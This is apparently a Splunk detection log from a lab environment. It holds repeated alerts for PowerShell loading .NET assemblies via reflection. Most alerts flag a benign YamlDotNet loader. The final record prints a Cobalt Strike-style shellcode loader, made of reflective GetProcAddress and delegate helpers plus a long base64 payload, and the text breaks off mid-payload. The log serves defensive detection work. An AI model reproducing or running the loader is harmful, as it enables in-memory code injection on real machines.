[\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T12:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T12:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664805332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T12:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T12:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664805332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T12:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T12:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664805332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="exchange01.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function func_get_proc_address { Param ($var_module, $var_procedure) $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string')) return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure)) } function func_get_delegate_type { Param ( [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters, [Parameter(Position = 1)] [Type] $var_return_type = [Void] ) $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed') $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed') return $var_type_builder.CreateType() } [Byte[]]$var_code = [System.Convert]::FromBase64String('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